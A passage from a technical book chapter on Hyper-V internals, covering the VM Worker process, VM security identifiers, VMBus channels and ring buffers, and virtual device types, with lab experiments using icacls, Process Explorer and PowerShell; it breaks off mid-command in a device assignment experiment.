Service Provider (VSP) for the initial setup.
One virtual device that deserves a deeper discussion is the virtual BIOS (implemented in the
Vmchipset.dll library). Its power-up method allows the VM to include the initial firmware executed
when the bootstrap VP is started. The BIOS VDEV extracts the correct firmware for the VM (legacy BIOS
in the case of Generation 1 VMs; UEFI otherwise) from the resource section of its own backing library,
builds the volatile configuration part of the firmware (like the ACPI and the SRAT table), and injects it
in the proper guest physical memory by using services provided by the VID driver. The VID driver is
indeed able to map memory ranges described by the VID memory block in user mode memory, acces-
sible by the VM Worker process (this procedure is internally called “memory aperture creation”).
[Figure: in the root partition/host OS, the Host Compute Service reaches the VMWP process through the IVirtualMachine COM interface; VMWP (hosting the VirtualMachine object, the Partition Manager, the Memory Manager, and the Virtual Motherboard) performs the cold start and talks to the VID, VMBus, WinHV, and VSP kernel components, which run on top of the hypervisor.]
FIGURE 9-24 The VM Worker process and its interface for performing a “cold start” of a VM.
After all the virtual devices have been successfully powered up, the VM Worker process can start the
bootstrap virtual processor of the VM by sending a proper IOCTL to the VID driver, which will start the VP
and its message pump (used for exchanging messages between the VID driver and the VM Worker process).
EXPERIMENT: Understanding the security of the VM Worker process and
the virtual hard disk files
In the previous section, we discussed how the VM Worker process is launched by the Host
Compute service (Vmcompute.exe) when a request to start a VM is delivered to the VMMS pro-
cess (through WMI). Before communicating with the Host Compute Service, the VMMS gener-
ates a security token for the new Worker process instance.
Three new entities have been added to the Windows security model to properly support virtual
machines (the Windows Security model has been extensively discussed in Chapter 7 of Part 1):
■ A “virtual machines” security group, identified with the S-1-5-83-0 security identifier.
■ A virtual machine security identifier (SID), based on the VM’s unique identifier (GUID). The
VM SID becomes the owner of the security token generated for the VM Worker process.
■ A VM Worker process security capability used to give applications running in
AppContainers access to Hyper-V services required by the VM Worker process.
In this experiment, you will create a new virtual machine through the Hyper-V manager in a
location that’s accessible only to the current user and to the administrators group, and you will
check how the security of the VM files and the VM Worker process change accordingly.
First, open an administrative command prompt and create a folder in one of the workstation’s
volumes (in the example we used C:\TestVm), using the following command:
md c:\TestVm
Then you need to strip off all the inherited ACEs (Access control entries; see Chapter 7 of Part 1
for further details) and add full access ACEs for the administrators group and the current logged-
on user. The following commands perform the described actions (you need to replace C:\TestVm
with the path of your directory and <UserName> with your currently logged-on user name):
icacls c:\TestVm /inheritance:r
icacls c:\TestVm /grant Administrators:(CI)(OI)F
icacls c:\TestVm /grant <UserName>:(CI)(OI)F
To verify that the folder has the correct ACL, you should open File Explorer (by pressing Win+E
on your keyboard), right-click the folder, select Properties, and finally click the Security tab. You
should see a window like the following one:
Open the Hyper-V Manager, create a VM (and its associated virtual disk), and store it in the newly
created folder (procedure available at the following page: https://docs.microsoft.com/en-us
/virtualization/hyper-v-on-windows/quick-start/create-virtual-machine). For this experiment, you
don’t really need to install an OS on the VM. After the New Virtual Machine Wizard ends, you
should start your VM (in the example, the VM is VM1).
Open a Process Explorer as administrator and locate the vmwp.exe process. Right-click it
and select Properties. As expected, you can see that the parent process is vmcompute.exe (Host
Compute Service). If you click the Security tab, you should see that the VM SID is set as the
owner of the process, and the token belongs to the Virtual Machines group:
The SID is composed from the VM GUID. In the example, the VM’s GUID is {F156B42C-4AE6-4291-8AD6-EDFE0960A1CE}.
(You can verify this also by using PowerShell, as explained in the “Playing with the Root scheduler”
experiment earlier in this chapter.) A GUID is a sequence of 16 bytes, organized as one 32-bit
(4-byte) integer, two 16-bit (2-byte) integers, and 8 final bytes.
The GUID in the example is organized as:
■ 0xF156B42C as the first 32-bit integer, which, in decimal, is 4048991276.
■ 0x4AE6 and 0x4291 as the two 16-bit integers, which, combined as one 32-bit value, is
0x42914AE6, or 1116818150 in decimal (remember that the system is little endian, so the least
significant byte is located at the lower address).
■ The final byte sequence is 0x8A, 0xD6, 0xED, 0xFE, 0x09, 0x60, 0xA1, and 0xCE (the fourth
part of the human-readable GUID shown, 8AD6, is a byte sequence, not a 16-bit value),
which, combined as two 32-bit values, is 0xFEEDD68A and 0xCEA16009, or 4276999818 and
3466682377 in decimal.
If you combine all the calculated decimal numbers with a general SID identifier emitted by the
NT authority (S-1-5) and the VM base RID (83), you should obtain the same SID shown in Process
Explorer (in the example, S-1-5-83-4048991276-1116818150-4276999818-3466682377).
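The derivation can be reproduced with a few lines of Python as an independent check of the arithmetic above (this is not code from the virtualization stack; it simply reinterprets the GUID's little-endian byte layout as four 32-bit sub-authorities):

```python
import uuid

def vm_guid_to_sid(guid_str):
    """Derive the Hyper-V VM SID (S-1-5-83-...) from a VM GUID.

    The 16 GUID bytes, taken in their little-endian wire layout, are
    reinterpreted as four little-endian 32-bit integers, which become
    the SID sub-authorities after the well-known VM base RID (83).
    """
    raw = uuid.UUID(guid_str).bytes_le  # GUID in little-endian wire format
    subauths = [int.from_bytes(raw[i:i + 4], "little") for i in range(0, 16, 4)]
    return "S-1-5-83-" + "-".join(str(s) for s in subauths)

print(vm_guid_to_sid("F156B42C-4AE6-4291-8AD6-EDFE0960A1CE"))
# → S-1-5-83-4048991276-1116818150-4276999818-3466682377
```

Running it against the example GUID reproduces exactly the SID displayed by Process Explorer.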
As you can see from Process Explorer, the VMWP process’s security token does not include the
Administrators group, and it hasn’t been created on behalf of the logged-on user. So how is it pos-
sible that the VM Worker process can access the virtual hard disk and the VM configuration files?
The answer resides in the VMMS process, which, at VM creation time, scans each component
of the VM’s path and modifies the DACL of the needed folders and files. In particular, the root
folder of the VM (which has the same name as the VM, so you should find a subfolder with your
VM’s name in the created directory) is accessible thanks to the added virtual
machines security group ACE. The virtual hard disk file is instead accessible thanks to an
access-allowed ACE targeting the virtual machine’s SID.
You can verify this by using File Explorer: Open the VM’s virtual hard disk folder (called Virtual
Hard Disks and located in the VM root folder), right-click the VHDX (or VHD) file, select Properties,
and then click the Security page. You should see two new ACEs other than the one set initially. (One
is the virtual machine ACE; the other one is the VmWorker process Capability for AppContainers.)
If you stop the VM and you try to delete the virtual machine ACE from the file, you will
see that the VM is not able to start anymore. For restoring the correct ACL for the virtual
hard disk, you can run a PowerShell script available at https://gallery.technet.microsoft.com/
Hyper-V-Restore-ACL-e64dee58.
VMBus
VMBus is the mechanism exposed by the Hyper-V virtualization stack to provide interpartition commu-
nication between VMs. It is a virtual bus device that sets up channels between the guest and the host.
These channels provide the capability to share data between partitions and set up paravirtualized (also
known as synthetic) devices.
The root partition hosts Virtualization Service Providers (VSPs) that communicate over VMBus
to handle device requests from child partitions. On the other end, child partitions (or guests) use
Virtualization Service Consumers (VSCs) to redirect device requests to the VSP over VMBus. Child parti-
tions require VMBus and VSC drivers to use the paravirtualized device stacks (more details on virtual
hardware support are provided later in this chapter in the ”Virtual hardware support” section). VMBus
channels allow VSCs and VSPs to transfer data primarily through two ring buffers: upstream and down-
stream. These ring buffers are mapped into both partitions thanks to the hypervisor, which, as dis-
cussed in the previous section, also provides interpartition communication services through the SynIC.
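The VSP/VSC exchange over the two ring buffers can be modeled with a toy sketch. This is illustrative only: the class and method names are invented, and real VMBus ring buffers are shared memory pages signaled through SynIC events, not Python queues.

```python
from collections import deque

class VmbusChannelModel:
    """Toy model of a VMBus channel: two one-way queues standing in
    for the upstream (guest VSC -> host VSP) and downstream
    (VSP -> VSC) ring buffers."""
    def __init__(self):
        self.upstream = deque()
        self.downstream = deque()

    def vsc_send(self, request):
        # The guest's VSC redirects a device request to the host.
        self.upstream.append(request)

    def vsp_service(self):
        # The host's VSP pops the request, handles it, and replies.
        request = self.upstream.popleft()
        self.downstream.append(("completed", request))

    def vsc_receive(self):
        # The guest consumes the completion from the downstream buffer.
        return self.downstream.popleft()

channel = VmbusChannelModel()
channel.vsc_send("read sector 42")
channel.vsp_service()
print(channel.vsc_receive())   # → ('completed', 'read sector 42')
```

The sketch shows only the data path; in the real implementation, each side signals the other through SynIC synthetic interrupts rather than polling the buffers.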
One of the first virtual devices (VDEV) that the Worker process starts while powering up a VM is the
VMBus VDEV (implemented in Vmbusvdev.dll). Its power-on routine connects the VM Worker process
to the VMBus root driver (Vmbusr.sys) by sending the VMBUS_VDEV_SETUP IOCTL to the VMBus root
device (named \Device\RootVmBus). The VMBus root driver orchestrates the parent endpoint of the
bidirectional communication to the child VM. Its initial setup routine, which is invoked before the
target VM is powered on, has the important role of creating an XPartition data structure, which is
used to represent the VMBus instance of the child VM and to connect the needed SynIC synthetic
interrupt sources (also known as SINTs; see the “Synthetic Interrupt Controller” section earlier in this chapter
for more details). In the root partition, VMBus uses two synthetic interrupt sources: one for the initial
message handshaking (which happens before the channel is created) and another one for the synthetic
events signaled by the ring buffers. Child partitions use only one SINT, though. The setup routine al-
locates the main message port in the child VM and the corresponding connection in the root, and, for
each virtual processor belonging to the VM, allocates an event port and its connection (used for receiv-
ing synthetic events from the child VM).
The two synthetic interrupt sources are mapped using two ISR routines, named KiVmbusInterrupt0
and KiVmbusInterrupt1. Thanks to these two routines, the root partition is ready to receive synthetic
interrupts and messages from the child VM. When a message (or event) is received, the ISR queues a
deferred procedure call (DPC), which checks whether the message is valid; if so, it queues a work item,
which will be processed later by the system running at passive IRQL level (which has further implica-
tions on the message queue).
Once VMBus in the root partition is ready, each VSP driver in the root can use the services exposed
by the VMBus kernel mode client library to allocate and offer a VMBus channel to the child VM. The
VMBus kernel mode client library (abbreviated as KMCL) represents a VMBus channel through an
opaque KMODE_CLIENT_CONTEXT data structure, which is allocated and initialized at channel creation
time (when a VSP calls the VmbChannelAllocate API). The root VSP then normally offers the channel
to the child VM by calling the VmbChannelEnable API (this function in the child establishes the actual
connection to the root by opening the channel). KMCL is implemented in two drivers: one running in
the root partition (Vmbkmclr.sys) and one loaded in child partitions (Vmbkmcl.sys).
CHAPTER 9 Virtualization technologies
Offering a channel in the root is a relatively complex operation that involves the following steps:
1. The KMCL driver communicates with the VMBus root driver through the file object initialized in
the VDEV power-up routine. The VMBus driver obtains the XPartition data structure representing
the child partition and starts the channel offering process.

2. Lower-level services provided by the VMBus driver allocate and initialize a LOCAL_OFFER data
structure representing a single “channel offer” and preallocate some SynIC predefined messages.
VMBus then creates the synthetic event port in the root, from which the child can connect to
signal events after writing data to the ring buffer. The LOCAL_OFFER data structure representing
the offered channel is added to an internal server channels list.

3. After VMBus has created the channel, it tries to send the OfferChannel message to the child
with the goal of informing it of the new channel. However, at this stage, VMBus fails because the
other end (the child VM) is not ready yet and has not started the initial message handshake.
After all the VSPs have completed the channel offering, and all the VDEV have been powered up
(see the previous section for details), the VM Worker process starts the VM. For channels to be com-
pletely initialized, and their relative connections to be started, the guest partition should load and start
the VMBus child driver (Vmbus.sys).
Initial VMBus message handshaking
In Windows, the VMBus child driver is a WDF bus driver enumerated and started by the Pnp manager
and located in the ACPI root enumerator. (Another version of the VMBus child driver is also available
for Linux. VMBus for Linux is not covered in this book, though.) When the NT kernel starts in the child
VM, the VMBus driver begins its execution by initializing its own internal state (which means allocat-
ing the needed data structure and work items) and by creating the \Device\VmBus root functional
device object (FDO). The Pnp manager then calls the VMBus’s resource assignment handler routine.
The latter configures the correct SINT source (by emitting a HvSetVpRegisters hypercall on one of the
HvRegisterSint registers, with the help of the WinHv driver) and connects it to the KiVmbusInterrupt2
ISR. Furthermore, it obtains the SIMP page, used for sending and receiving synthetic messages to and
from the root partition (see the “Synthetic Interrupt Controller” section earlier in this chapter for more
details), and creates the XPartition data structure representing the parent (root) partition.
When the request to start the VMBus FDO comes from the Pnp manager, the VMBus driver starts
the initial message handshaking. At this stage, each message is sent by emitting the HvPostMessage
hypercall (with the help of the WinHv driver), which allows the hypervisor to inject a synthetic interrupt
to a target partition (in this case, the target is the root partition). The receiver acquires the message by
simply reading from the SIMP page; the receiver signals that the message has been read from the queue
by setting the new message type to MessageTypeNone. (See the hypervisor TLFS for more details.) The
reader can think of the initial message handshake, which is represented in Figure 9-25, as a process
divided in two phases.
FIGURE 9-25 VMBus initial message handshake. (The figure shows the messages exchanged over time between the root partition and the child VM: Initiate Contact, Version Response, Request Offers, Offer Channel (multiple messages), All Offers Delivered, GPADL Header, GPADL Body, GPADL Created, Open Channel, and Open Channel Result, with the first phase enumerating all channels and delivering their offers, and the second phase opening the channel and creating the ring buffer.)
The first phase is represented by the Initiate Contact message, which is delivered once in the lifetime
of the VM. This message is sent from the child VM to the root with the goal to negotiate the VMBus
protocol version supported by both sides. At the time of this writing, there are five main VMBus pro-
tocol versions, with some additional slight variations. The root partition parses the message, asks the
hypervisor to map the monitor pages allocated by the client (if supported by the protocol), and replies
by accepting the proposed protocol version. Note that if this is not the case (which happens when the
Windows version running in the root partition is lower than the one running in the child VM), the child
VM restarts the process by downgrading the VMBus protocol version until a compatible version is es-
tablished. At this point, the child is ready to send the Request Offers message, which causes the root
partition to send the list of all the channels already offered by the VSPs. This allows the child partition
to open the channels later in the handshaking protocol.
Figure 9-25 highlights the different synthetic messages delivered through the hypervisor for setting
up the VMBus channel or channels. The root partition walks the list of the offered channels located in
the Server Channels list (LOCAL_OFFER data structure, as discussed previously), and, for each of them,
sends an Offer Channel message to the child VM. The message is the same as the one sent at the final
stage of the channel offering protocol, which we discussed previously in the “VMBus” section. So, while
the first phase of the initial message handshake happens only once per lifetime of the VM, the second
phase can start any time when a channel is offered. The Offer Channel message includes important
data used to uniquely identify the channel, like the channel type and instance GUIDs. For VDEV chan-
nels, these two GUIDs are used by the Pnp Manager to properly identify the associated virtual device.
The child responds to the message by allocating the client LOCAL_OFFER data structure represent-
ing the channel and the relative XInterrupt object, and by determining whether the channel requires
a physical device object (PDO) to be created, which is usually always true for VDEVs’ channels. In this
case, the VMBus driver creates an instance PDO representing the new channel. The created device is
protected through a security descriptor that renders it accessible only from system and administra-
tive accounts. The VMBus standard device interface, which is attached to the new PDO, maintains
the association between the new VMBus channel (through the LOCAL_OFFER data structure) and
the device object. After the PDO is created, the Pnp Manager is able to identify and load the correct
VSC driver through the VDEV type and instance GUIDs included in the Offer Channel message. These
interfaces become part of the new PDO and are visible through the Device Manager. See the following
experiment for details. When the VSC driver is then loaded, it usually calls the VmbChannelEnable API
(exposed by KMCL, as discussed previously) to “open” the channel and create the final ring buffer.
EXPERIMENT: Listing virtual devices (VDEVs) exposed through VMBus
Each VMBus channel is identified through a type and instance GUID. For channels belonging to
VDEVs, the type and instance GUID also identifies the exposed device. When the VMBus child
driver creates the instance PDOs, it includes the type and instance GUID of the channel in mul-
tiple devices’ properties, like the instance path, hardware ID, and compatible ID. This experiment
shows how to enumerate all the VDEVs built on the top of VMBus.
For this experiment, you should build and start a Windows 10 virtual machine through the
Hyper-V Manager. When the virtual machine is started and runs, open the Device Manager (by
typing its name in the Cortana search box, for example). In the Device Manager applet, click the
View menu, and select Device by Connection. The VMBus bus driver is enumerated and started
through the ACPI enumerator, so you should expand the ACPI x64-based PC root node and then
the ACPI Module Device located in the Microsoft ACPI-Compliant System child node, as shown in
the following figure:
By opening the ACPI Module Device, you should find another node, called Microsoft Hyper-V
Virtual Machine Bus, which represents the root VMBus PDO. Under that node, the Device
Manager shows all the instance devices created by the VMBus FDO after their relative VMBus
channels have been offered from the root partition.
Now right-click one of the Hyper-V devices, such as the Microsoft Hyper-V Video device, and
select Properties. For showing the type and instance GUIDs of the VMBus channel backing the
virtual device, open the Details tab of the Properties window. Three device properties include
the channel’s type and instance GUID (exposed in different formats): Device Instance path,
Hardware ID, and Compatible ID. Although the compatible ID contains only the VMBus channel
type GUID ({da0a7802-e377-4aac-8e77-0558eb1073f8} in the figure), the hardware ID and device
instance path contain both the type and instance GUIDs.
Opening a VMBus channel and creating the ring buffer
To correctly start the interpartition communication and create the ring buffer, a channel
must be opened. Usually VSCs, after having allocated the client side of the channel (still through
VmbChannelAllocate), call the VmbChannelEnable API exported from the KMCL driver. As introduced
in the previous section, this API in the child partitions opens a VMBus channel, which has
already been offered by the root. The KMCL driver communicates with the VMBus driver, obtains
the channel parameters (like the channel’s type, instance GUID, and used MMIO space), and creates
a work item for the received packets. It then allocates the ring buffer, which is shown in Figure 9-26.
The size of the ring buffer is usually specified by the VSC through a call to the KMCL exported
VmbClientChannelInitSetRingBufferPageCount API.
FIGURE 9-26 An example of a 16-page ring buffer allocated in the child partition. (The figure shows the physical layout of the incoming and outgoing buffers with their control pages, the double-mapped ring buffer virtual layout, and a write request wrapping around the end of the mapped ring buffer.)
The ring buffer is allocated from the child VM’s non-paged pool and is mapped through a memory
descriptor list (MDL) using a technique called double mapping. (MDLs are described in Chapter 5 of
Part 1.) In this technique, the allocated MDL describes a double number of the incoming (or outgoing)
buffer’s physical pages. The PFN array of the MDL is filled by including the physical pages of the buffer
twice: one time in the first half of the array and one time in the second half. This creates a “ring buffer.”
For example, in Figure 9-26, the incoming and outgoing buffers are 16 pages (0x10) large. The
outgoing buffer is mapped at address 0xFFFFCA803D8C0000. If the sender writes a 1-KB VMBus packet
to a position close to the end of the buffer, let’s say at offset 0xFF00, the write succeeds (no access
violation exception is raised), but the data will be written partially in the end of the buffer and partially
in the beginning. In Figure 9-26, only 256 (0x100) bytes are written at the end of the buffer, whereas the
remaining 768 (0x300) bytes are written in the start.
Both the incoming and outgoing buffers are surrounded by a control page. The page is shared be-
tween the two endpoints and composes the VM ring control block. This data structure is used to keep
track of the position of the last packet written in the ring buffer. It furthermore contains some bits to
control whether to send an interrupt when a packet needs to be delivered.
After the ring buffer has been created, the KMCL driver sends an IOCTL to VMBus, requesting the
creation of a GPA descriptor list (GPADL). A GPADL is a data structure very similar to an MDL and is used
for describing a chunk of physical memory. Differently from an MDL, the GPADL contains an array of
guest physical addresses (GPAs, which are always expressed as 64-bit numbers, differently from the
PFNs included in a MDL). The VMBus driver sends different messages to the root partition for transfer-
ring the entire GPADL describing both the incoming and outcoming ring buffers. (The maximum size
of a synthetic message is 240 bytes, as discussed earlier.) The root partition reconstructs the entire
GPADL and stores it in an internal list. The GPADL is mapped in the root when the child VM sends the
final Open Channel message. The root VMBus driver parses the received GPADL and maps it in its own
physical address space by using services provided by the VID driver (which maintains the list of memory
block ranges that comprise the VM physical address space).
At this stage the channel is ready: the child and the root partition can communicate by simply reading
or writing data to the ring buffer. When a sender finishes writing its data, it calls the
VmbChannelSendSynchronousRequest API exposed by the KMCL driver. The API invokes VMBus services
to signal an event in the monitor page of the Xinterrupt object associated with the channel (old versions
of the VMBus protocol used an interrupt page, which contained a bit corresponding to each channel).
Alternatively, VMBus can signal an event directly in the channel’s event port; the choice depends only
on the required latency.
Besides VSCs, other components use VMBus to implement higher-level interfaces. Good examples
are provided by the VMBus pipes, which are implemented in two kernel mode libraries (Vmbuspipe.dll
and Vmbuspiper.dll) and rely on services exposed by the VMBus driver (through IOCTLs). Hyper-V Sockets
(also known as HvSockets) allow high-speed interpartition communication using standard network
interfaces (sockets). A client connects an AF_HYPERV socket type to a target VM by specifying the target
VM’s GUID and a GUID of the Hyper-V socket’s service registration (to use HvSockets, both endpoints
must be registered in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\
GuestCommunicationServices registry key) instead of the target IP address and port. Hyper-V Sockets
are implemented in multiple drivers: HvSocket.sys is the transport driver, which exposes low-level services
used by the socket infrastructure; HvSocketControl.sys is the provider control driver used to load the
HvSocket provider in case the VMBus interface is not present in the system; HvSocket.dll is a library that
exposes supplementary socket interfaces (tied to Hyper-V sockets) callable from user mode applications.
Describing the internal infrastructure of both Hyper-V Sockets and VMBus pipes is outside the scope of
this book, but both are documented in Microsoft Docs.
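The GuestCommunicationServices registration mentioned above can be sketched as a registry fragment. The service GUID below is a made-up placeholder; each Hyper-V socket service registers its own GUID as a subkey, typically with a friendly ElementName value.

```reg
Windows Registry Editor Version 5.00

; Hypothetical service GUID, shown only for illustration.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices\{00000000-1111-2222-3333-444444444444}]
"ElementName"="Sample HvSocket service"
```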
Virtual hardware support
To properly run virtual machines, the virtualization stack needs to support virtualized devices.
Hyper-V supports different kinds of virtual devices, which are implemented in multiple components
of the virtualization stack. I/O to and from virtual devices is orchestrated mainly in the root OS. I/O
includes storage, networking, keyboard, mouse, serial ports and GPU (graphics processing unit). The
virtualization stack exposes three kinds of devices to the guest VMs:
■ Emulated devices, also known—in industry-standard form—as fully virtualized devices
■ Synthetic devices, also known as paravirtualized devices
■ Hardware-accelerated devices, also known as direct-access devices
For performing I/O to physical devices, the processor usually reads and writes data from input and
output ports (I/O ports), which belong to a device. The CPU can access I/O ports in two ways:
■ Through a separate I/O address space, which is distinct from the physical memory address
space and, on AMD64 platforms, consists of 64 thousand individually addressable I/O ports.
This method is old and generally used for legacy devices.
■ Through memory-mapped I/O. Devices that respond like memory components can be accessed
through the processor’s physical memory address space. This means that the CPU accesses
memory through standard instructions: the underlying physical memory is mapped to a device.
Figure 9-27 shows an example of an emulated device (the virtual IDE controller used in Generation 1
VMs), which uses memory-mapped I/O for transferring data to and from the virtual processor.
FIGURE 9-27 The virtual IDE controller, which uses emulated I/O to perform data transfer. (The figure shows the root partition/host OS running VMMS, HCS, and the VM Worker process hosting the IDE VDEV and VSPs, with the VID, VMBus, and WinHv drivers above the hypervisor and hardware, and VM1 with its guest physical address space, processes, file system/volume, disk driver, and IDE storage driver.)
In this model, every time the virtual processor reads or writes to the device MMIO space or emits
instructions to access the I/O ports, it causes a VMEXIT to the hypervisor. The hypervisor calls the
proper intercept routine, which is dispatched to the VID driver. The VID driver builds a VID message
and enqueues it in an internal queue. The queue is drained by an internal VMWP’s thread, which waits
and dispatches the VP’s messages received from the VID driver; this thread is called the message pump
thread and belongs to an internal thread pool initialized at VMWP creation time. The VM Worker
process identifies the physical address causing the VMEXIT, which is associated with the proper virtual
device (VDEV), and calls into one of the VDEV callbacks (usually read or write callback). The VDEV code
uses the services provided by the instruction emulator to execute the faulting instruction and properly
emulate the virtual device (an IDE controller in the example).
NOTE The full instruction emulator located in the VM Worker process is also used for other
purposes, such as to speed up cases of intercept-intensive code in a child partition.
The emulator in this case allows the execution context to stay in the Worker process between
intercepts, as VMEXITs have serious performance overhead. Older versions of the hardware
virtualization extensions prohibited executing real-mode code in a virtual machine; for those
cases, the virtualization stack used the emulator for executing real-mode code in a VM.
Paravirtualized devices
While emulated devices always produce VMEXITs and are quite slow, Figure 9-28 shows an example
of a synthetic or paravirtualized device: the synthetic storage adapter. Synthetic devices know that they run
in a virtualized environment; this reduces the complexity of the virtual device and allows it to achieve
higher performance. Some synthetic virtual devices exist only in virtual form and don’t emulate any
real physical hardware (an example is synthetic RDP).
FIGURE 9-28 The storage controller paravirtualized device. (The figure shows the root partition/host OS running VMMS, HCS, and the VM Worker process hosting the SynthStor VDEV, with StorVSP, vhdmp, the file system, VID, VMBus, and WinHv above the hypervisor and hardware, and VM1 with its processes, file system/volume, disk driver, and StorVSC.)
Paravirtualized devices generally require three main components:
■ A virtualization service provider (VSP) driver runs in the root partition and exposes virtualization-specific
interfaces to the guest thanks to the services provided by VMBus (see the previous
section for details on VMBus).
■ A synthetic VDEV is mapped in the VM Worker process and usually cooperates only in the start-up,
teardown, save, and restore of the virtual device. It is generally not used during the regular
work of the device. The synthetic VDEV initializes and allocates device-specific resources (in the
example, the SynthStor VDEV initializes the virtual storage adapter), but most importantly allows
the VSP to offer a VMBus communication channel to the guest VSC. The channel will be used for
communication with the root and for signaling device-specific notifications via the hypervisor.
■ A virtualization service consumer (VSC) driver runs in the child partition, understands the virtualization-specific
interfaces exposed by the VSP, and reads/writes messages and notifications
from the shared memory exposed through VMBus by the VSP. This allows the virtual device to
run in the child VM faster than an emulated device.
Hardware-accelerated devices
On server SKUs, hardware-accelerated devices (also known as direct-access devices) allow physical de-
vices to be remapped in the guest partition, thanks to the services exposed by the VPCI infrastructure.
When a physical device supports technologies like single-root input/output virtualization (SR-IOV) or
Discrete Device Assignment (DDA), it can be mapped to a guest partition. The guest partition can di-
rectly access the MMIO space associated with the device and can perform DMA to and from the guest
memory directly without any interception by the hypervisor. The IOMMU provides the needed security
and ensures that the device can initiate DMA transfers only in the physical memory that belongs to the
virtual machine.
Figure 9-29 shows the components responsible for managing hardware-accelerated devices:
■ The VPci VDEV (Vpcievdev.dll) runs in the VM Worker process. Its role is to extract the list of
hardware-accelerated devices from the VM configuration file, set up the VPCI virtual bus, and
assign a device to the VSP.
■ The PCI Proxy driver (Pcip.sys) is responsible for dismounting and mounting a DDA-compatible
physical device from the root partition. Furthermore, it has the key role in obtaining the list of
resources used by the device (through the SR-IOV protocol) like the MMIO space and interrupts.
The proxy driver provides access to the physical configuration space of the device and renders
an “unmounted” device inaccessible to the host OS.
■ The VPCI virtual service provider (Vpcivsp.sys) creates and maintains the virtual bus object,
which is associated with one or more hardware-accelerated devices (which in the VPCI VSP are
called virtual devices). The virtual devices are exposed to the guest VM through a VMBus channel
created by the VSP and offered to the VSC in the guest partition.
■ The VPCI virtual service client (Vpci.sys) is a WDF bus driver that runs in the guest VM. It connects
to the VMBus channel exposed by the VSP, receives the list of the direct-access devices
exposed to the VM and their resources, and creates a PDO (physical device object) for each of
them. The device drivers can then attach to the created PDOs in the same way as they do in
nonvirtualized environments.
When a user wants to map a hardware-accelerated device to a VM, they use some PowerShell
commands (see the following experiment for further details), which start by “unmounting” the device
from the root partition. This action forces the VMMS service to communicate with the standard PCI
driver (through its exposed device, called PciControl). The VMMS service sends a
PCIDRIVE_ADD_VMPROXYPATH IOCTL to the PCI driver by providing the device descriptor (in the form
of bus, device, and function ID). The PCI driver checks the descriptor, and, if the verification succeeds, adds it to the
HKLM\System\CurrentControlSet\Control\PnP\Pci\VmProxy registry value. The VMMS then starts a
PNP device (re)enumeration by using services exposed by the PNP manager. In the enumeration phase,
the PCI driver finds the new proxy device and loads the PCI proxy driver (Pcip.sys), which marks the
device as reserved for the virtualization stack and renders it invisible to the host operating system.
FIGURE 9-29 Hardware-accelerated devices. (The figure shows the root partition/host OS running VMMS, HCS, and the VM Worker process hosting the VPci VDEV, with the vPCI VSP, Pcip, Pci, VID, VMBus, and WinHv drivers above the hypervisor, the IOMMU in hardware, and VM1 with its guest physical address space, processes, NVMe driver, file system/volume, disk driver, and vPCI VSC.)
The second step requires assigning the device to a VM. In this case, the VMMS writes the device
descriptor in the VM configuration file. When the VM is started, the VPCI VDEV (vpcievdev.dll) reads the
direct-access device’s descriptor from the VM configuration, and starts a complex configuration phase
that is orchestrated mainly by the VPCI VSP (Vpcivsp.sys). Indeed, in its “power on” callback, the VPCI
VDEV sends different IOCTLs to the VPCI VSP (which runs in the root partition), with the goal to perform
the creation of the virtual bus and the assignment of hardware-accelerated devices to the guest VM.
A “virtual bus” is a data structure used by the VPCI infrastructure as a “glue” to maintain the con-
nection between the root partition, the guest VM, and the direct-access devices assigned to it. The
VPCI VSP allocates and starts the VMBus channel offered to the guest VM and encapsulates it in the
virtual bus. Furthermore, the virtual bus includes some pointers to important data structures, like some
allocated VMBus packets used for the bidirectional communication, the guest power state, and so on.
After the virtual bus is created, the VPCI VSP performs the device assignment.
A hardware-accelerated device is internally identified by a LUID and is represented by a virtual
device object, which is allocated by the VPCI VSP. Based on the device’s LUID, the VPCI VSP locates the
proper proxy driver (also known as the Mux driver; it’s usually Pcip.sys). The VPCI VSP queries
the SR-IOV or DDA interfaces from the proxy driver and uses them to obtain the Plug and Play informa-
tion (hardware descriptor) of the direct-access device and to collect the resource requirements (MMIO
space, BAR registers, and DMA channels). At this point, the device is ready to be attached to the guest
VM: the VPCI VSP uses the services exposed by the WinHvr driver to emit the HvAttachDevice hypercall
to the hypervisor, which reconfigures the system IOMMU for mapping the device’s address space in the
guest partition.
The guest VM is aware of the mapped device thanks to the VPCI VSC (Vpci.sys). The VPCI VSC is
a WDF bus driver enumerated and launched by the VMBus bus driver located in the guest VM. It is
composed of two main components: a FDO (functional device object) created at VM boot time, and
one or more PDOs (physical device objects) representing the physical direct-access devices remapped
in the guest VM. When the VPCI VSC bus driver is executed in the guest VM, it creates and starts the cli-
ent part of the VMBus channel used to exchange messages with the VSP. “Send bus relations” is the first
message sent by the VPCI VSC through the VMBus channel. The VSP in the root partition responds by
sending the list of hardware IDs describing the hardware-accelerated devices currently attached to the
VM. When the PNP manager requests the new device relations from the VPCI VSC, the latter creates a new
PDO for each discovered direct-access device. The VSC driver sends another message to the VSP with
the goal of requesting the resources used by the PDO.
After the initial setup is done, the VSC and VSP are rarely involved in the device management. The
specific hardware-accelerated device’s driver in the guest VM attaches to the relative PDO and man-
ages the peripheral as if it had been installed on a physical machine.
EXPERIMENT: Mapping a hardware-accelerated NVMe disk to a VM
As explained in the previous section, physical devices that support SR-IOV and DDA technologies
can be directly mapped in a guest VM running in a Windows Server 2019 host. In this experiment,
we are mapping an NVMe disk, which is connected to the system through the PCI-Ex bus and
supports DDA, to a Windows 10 VM. (Windows Server 2019 also supports the direct assignment
of a graphics card, but this is outside the scope of this experiment.)
As explained at https://docs.microsoft.com/en-us/virtualization/community/team-blog/2015
/20151120-discrete-device-assignment-machines-and-devices, for being able to be reassigned,
a device should have certain characteristics, such as supporting message-signaled interrupts
and memory-mapped I/O. Furthermore, the machine in which the hypervisor runs should sup-
port SR-IOV and have a proper I/O MMU. For this experiment, you should start by verifying that
the SR-IOV standard is enabled in the system BIOS (not explained here; the procedure varies
based on the manufacturer of your machine).
The next step is to download a PowerShell script that verifies whether your NVMe control-
ler is compatible with Discrete Device Assignment. You should download the survey-dda.ps1
PowerShell script from https://github.com/MicrosoftDocs/Virtualization-Documentation/tree
/master/hyperv-samples/benarm-powershell/DDA. Open an administrative PowerShell window
(by typing PowerShell in the Cortana search box and selecting Run As Administrator) and
check whether the PowerShell script execution policy is set to unrestricted by running the
Get-ExecutionPolicy command. If the command yields output other than Unrestricted,
you should type the following: Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy
